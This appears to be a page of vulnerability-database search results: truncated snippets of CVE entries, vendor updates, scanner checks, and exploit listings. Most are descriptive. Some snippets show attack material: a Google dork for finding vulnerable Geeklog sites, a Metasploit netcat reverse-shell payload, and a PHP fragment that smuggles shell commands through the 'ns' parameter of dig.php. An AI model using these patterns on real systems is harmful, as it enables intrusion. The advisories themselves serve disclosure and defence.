[SECURITY] Fedora 10 Update: mapserver-5.2.3-1.fc10

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

Geeklog <= 1.6.0sr1 Remote Arbitrary File Upload Vulnerability

No description provided by source. ============================================================================== Geeklog = v1.6.0sr1 - Remote Arbitrary File Upload Software Site: http://www.geeklog.net Dork: "By Geeklog" "Created this page in" +seconds +powered inurl:publichtml...

Geeklog 1.6.0sr1 File Upload

============================================================================== Geeklog with the URL of the Geeklog site. Opens an interactive browser session where you can create directories and upload files. This also exposes all the files in the images/Library/File|Image|Media|Flash directories...

Memcached多个基于堆的缓冲区溢出漏洞

Bugraq ID: 35989 CVE ID：CVE-2009-2415 Danga Interactive memcached是一款高性能的分布式内存缓存解决方案。 memcached在解析部分长度属性时存在由整数转换而造成基于堆的缓冲区溢出，远程攻击者可以利用漏洞以memcached运行进程权限执行任意代码。 目前没有更多详细信息系统。 Danga Interactive memcached 1.2.8 Danga Interactive memcached 1.2.7 Debian Linux用户可参考如下升级程序： Debian GNU/Linux 4.0 etch Debia...

Snitz Forums 2000 Detection

This host is running Snitz Forums 2000, an freeware interactive discussion environment. OpenVAS Vulnerability Test $Id: snitzforums2000detect.nasl 5744 2017-03-28 07:25:23Z cfi $ Snitz Forums 2000 Detection Authors: Michael Meyer Copyright: Copyright c 2009 Greenbone Networks GmbH This program is...

Snitz Forums 2000 Detection

This host is running Snitz Forums 2000, a freeware interactive discussion environment. SPDX-FileCopyrightText: 2009 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only...

Unix Command Shell, Reverse TCP (via netcat)

Creates an interactive shell via netcat This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = :dynamic include Msf::Payload::Single include Msf::Sessions::CommandShellOptions def...

CVE-2009-1981

Unspecified vulnerability in the Highly Interactive Client component in Siebel Product Suite 7.5.3, 7.7.2, 7.8.2, 8.0.0.5, and 8.1.0 allows local users to affect confidentiality and integrity via unknown vectors...

Microsoft Windows SMB Last Logged On User Disclosure

By connecting to the remote host with the supplied credentials, Nessus was able to identify the username associated with the last successful logon. Microsoft documentation notes that interactive console logons change the DefaultUserName registry entry to be the last logged-on user. C Tenable...

Security hole in Adobe Flash Media Server

Adobe has shipped a Flash Media Server patch to fix a vulnerability adobe.com that allowed attackers to execute remote procedures in Flash Media Interactive Server or Flash Media Streaming Server. The update is available for Adobe Flash Media Streaming Server 3.5.1, Adobe Flash Media Interactive...

Memcached stats maps命令信息泄露漏洞

BUGTRAQ ID: 34756 CVECAN ID: CVE-2009-1255 Memcached是一个开源的多平台数据库缓存软件。 如果远程攻击者连接到了memcached的TCP端口（默认11211）并发布了stats maps命令，Memcached就会直接将/proc/self/maps的输出管道传输给客户端。这可能导致泄漏所分配内存区域的地址。 Danga Interactive memcached 1.2.7 MemcacheDB MemcacheDB 1.2 Danga Interactive -----------------...

Adobe Reader 'spell.customDictionaryOpen()' JavaScript Function Remote Code Execution Vulnerability

Description Adobe Reader is prone to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the application or crash the application, denying service to legitimate users. Reader 8.1.4 for Linux is vulnerable; oth...

Sun Solaris ip(7P)实现拒绝服务漏洞

BUGTRAQ ID: 33550 CVE ID：CVE-2009-0480 CNCVE ID：CNCVE-20090480 Sun Solaris是一款商业性质的操作系统。 Sun Solaris IP7pInternet协议相关最小号分配的实现存在安全问题，本地攻击者可以利用漏洞分配大量套接字而导致32位应用程序触发拒绝服务攻击。 目前没有详细漏洞细节提供。 Sun Solaris 9x86 Sun Solaris 9 Sun Solaris 8x86 Sun Solaris 8 Sun Solaris 10x86 Sun Solaris 10 Sun OpenSolaris bui...

DNS Tools PHP Digger Interactive Shell

\n"; arrayshift$argv; $host = $argv0; Start the interactive shell while1 fwriteSTDOUT, "shell: "; $cmd = trimfgetsSTDIN; if $cmd == "exit"die; else $attackurl = "http://".$host."/dig.php?ns=||".$cmd."||&host=mortal-team.net&queryt...

Mandriva Update for console-tools MDKA-2007:077 (console-tools)

Check for the Version of console-tools OpenVAS Vulnerability Test Mandriva Update for console-tools MDKA-2007:077 console-tools Authors: System Generated Check Copyright: Copyright c 2009 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/...

[SECURITY] Fedora 9 Update: mapserver-5.2.2-1.fc9

Mapserver is an internet mapping program that converts GIS data to map images in real time. With appropriate interface pages, Mapserver can provide an interactive internet map based on custom GIS data...

Cross site scripting

Cross-site scripting XSS vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action...

Sql injection

SQL injection vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to execute arbitrary SQL commands via the LinkServID parameter...

CVE-2008-6434

SQL injection vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to execute arbitrary SQL commands via the LinkServID parameter...

CVE-2008-6433

Cross-site scripting XSS vulnerability in index.cfm in Blue River Interactive Group Sava CMS before 5.0.122 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action...